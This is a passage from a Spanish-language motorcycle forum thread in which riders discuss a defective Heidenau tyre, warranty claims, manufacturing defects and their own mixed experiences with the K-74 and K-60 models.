En fin , no te ha pasado nada y has recuperado la pasta, date por satisfecho. Ya lo pagaran con la publicidad negativa que esto les supone, pues ahora con el internet, estas cosas corren como la polvora y el daño puede ser muy grande. Deberian darse cuenta.

ranex
16/02/2016, 19:18
También es que no tenemos costumbre, ganas o sencillamente tiempo de reclamar, pero haciéndolo y teniendo razón, siempre se suele salir ganador. Yo he reclamado varias cosas y aunque me ha costado echarle bastante tiempo, siempre me han acabado dando la razón como es el caso.
Claro que juegan eso también.

barbo7
16/02/2016, 23:52
Estoy convencido que,por ejemplo, con unas Michelin Desert(con el mismo uso)hay menos posibilidades(no ninguna por supuesto)de que pase esto.

Joan KLX
17/02/2016, 20:44
Una cosa es que el producto sea malo siempre y otra un defecto puntual. Una cosa es un producto caro y especializado y otra uno de batalla con menos prestaciones pero no por ello malo o peligroso.
Fallos de calidad los tienen todos, incluso marcas de primera fila.Se ve en moto GP en Formula 1 y lo veo todos los dias en mi trabajo.
Otra cosa es que no se quieran asumir responsabilidades, que por cierto tambien es cosa muy habitual.
Eso que te ha pasado con esa marca ha pasado muchas veces con otras mas conocidas. No deberia ser así, pero lamentablemente los defectos a veces solo se ven al probar el producto.
Cuando te paso esto, hable con el delegado en España de una marca de primera linea que nos surte a nosotros de neumaticos y le comente el caso. Me decia que no es posible que ocurra una cosa así en una partida de fabricacion sin que salten los chivatos de calidad. Pero eso lo dicen todos, lo veo a diario y luego pasa lo que pasa.
Y como son temas muy delicados por tema de seguridad y las responsabilidades que conlleva. Pues nadie reconoce nada, piensan que somos unos mindunguis y no va a llegar la sangre al rio. Ahora cuando es por ejemplo mi empresa quien les reclama, se cagan garras abajo.
En fin , no te ha pasado nada y has recuperado la pasta, date por satisfecho. Ya lo pagaran con la publicidad negativa que esto les supone, pues ahora con el internet, estas cosas corren como la polvora y el daño puede ser muy grande. Deberian darse cuenta.

Cuanta razón tienes. :aplauso::aplauso::aplauso::asias:

Salut!! :sombrero:

Pineiro
20/03/2016, 17:44
Yo por mi experiencia en la de enduro, en estas ni idea, aunque sera mas menos igual, lo achacaria al mal almacenamiento de las ruedas, quizas en un ambiente demasiado seco. otra cosa a vigilar es la edad de los neumaticos, que la fecha de fabricacion no sea muy vieja.

Alex

katune
20/03/2016, 22:04
A mi me gustaria dejar claro mi experiencia con este neumatico y mas ahora que un amigo se ha dado un buena ostia por culpa de una goma,aunque no sea esta marca

el año pasado compre un heidenau k-74 de 17 NUEVO
lo puse y los 5 MINUTOS ya vi que era una PM
aguante la salida con los HUEVOS DE CORBATA
una vez en casa lo quite de la moto y LO REGALE
en apariencia el neumatico estaba bien
en la realidad no VOLVERE A COMPRAR UN HEIDENAU

creo que me explicado.......................................

Carlos75
20/03/2016, 23:06
Mi experiencia con Heidenau: Llevo 3 juegos de K-60 en mi Dominator. Es un buen neumático con excelente compromiso entre adherencia en asfalto y agarre en pistas.

No se como será el K-74 porque no lo he probado, ni lo necesito para el uso que le doy a la moto. Los tres
amigos que conozco que lleven Heidenau K-60 están contentos. Y nadie me regala estos neumáticos, los compro. Los conocidos que yo sepa que han caído no llevaban esta marca.

Yo me quiero mucho y uso lo que me da seguridad. No es bueno generalizar y ante un fallo en una unidad hay
que reclamar, que no estamos acostumbrados.